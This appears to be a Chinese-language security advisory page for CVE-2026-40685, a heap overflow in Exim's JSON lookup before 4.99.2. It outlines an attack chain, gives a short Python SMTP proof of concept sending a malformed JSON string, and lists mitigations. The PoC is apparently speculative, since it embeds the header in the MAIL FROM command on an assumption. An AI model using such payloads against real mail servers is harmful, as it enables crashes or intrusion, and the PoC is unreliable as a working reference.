CVE-2026-40685 CVSS 6.5 中危

CVE-2026-40685 Exim JSON解析堆越界写入漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40685

漏洞类型

堆溢出

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Exim

漏洞概述

Exim邮件传输代理在4.99.2之前的版本中存在安全漏洞。当启用JSON查找功能时，解析器在处理不受信任头部中的畸形JSON数据时，由于反斜杠跳转实现不正确，导致发生越界堆写入。该漏洞允许未经身份验证的攻击者通过网络发起攻击，可能造成敏感信息泄露或拒绝服务。

技术细节

该漏洞源于Exim在解析JSON数据时的逻辑错误，特别是在处理反斜杠转义字符时未能正确计算索引。当JSON查找功能被启用时，攻击者可以向不受信任的头部字段注入特制的畸形JSON字符串。由于解析器在跳过字符时发生错误，导致在堆内存上进行写入操作时越过缓冲区边界。考虑到Exim通常以root权限运行，该漏洞可能导致远程代码执行（RCE）或拒绝服务（DoS），严重威胁服务器安全。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找配置了JSON查找功能的Exim服务器，版本需小于4.99.2。

STEP 2

构造载荷

利用反斜杠跳转逻辑缺陷，精心构造包含畸形JSON数据的恶意头部字段。

STEP 3

投递载荷

攻击者通过SMTP协议连接目标服务器，将恶意JSON数据注入到邮件头部发送给服务器。

STEP 4

触发漏洞

Exim解析器处理该头部时触发越界堆写入，导致服务崩溃或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
target_ip = "127.0.0.1"
target_port = 25

# Malformed JSON payload to trigger incorrect \ skipping
# This payload is crafted to cause an out-of-bounds heap write
malformed_json = '{"a": "\\\\x00"}'

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    
    # SMTP Interaction
    s.recv(1024) # Banner
    s.send(b"HELO test.com\r\n")
    s.recv(1024)
    
    # Send payload in a header that triggers JSON lookup
    # Assuming 'X-JSON-Test' might be used in a lookup configuration
    s.send(f"MAIL FROM:<attacker@local> X-Trigger-JSON: {malformed_json}\r\n".encode())
    s.recv(1024)
    
    s.send(b"RCPT TO:<victim@local>\r\n")
    s.recv(1024)
    s.send(b"DATA\r\n")
    s.recv(1024)
    s.send(b"Subject: PoC\r\n\r\n.\r\n")
    s.recv(1024)
    
    s.close()
    print("Payload sent.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Exim < 4.99.2

防御指南

临时缓解措施

如果无法立即更新Exim，管理员应检查配置文件并禁用JSON查找功能，以消除漏洞触发的必要条件。同时，应加强邮件服务器的入站流量监控，过滤包含异常JSON特征的流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表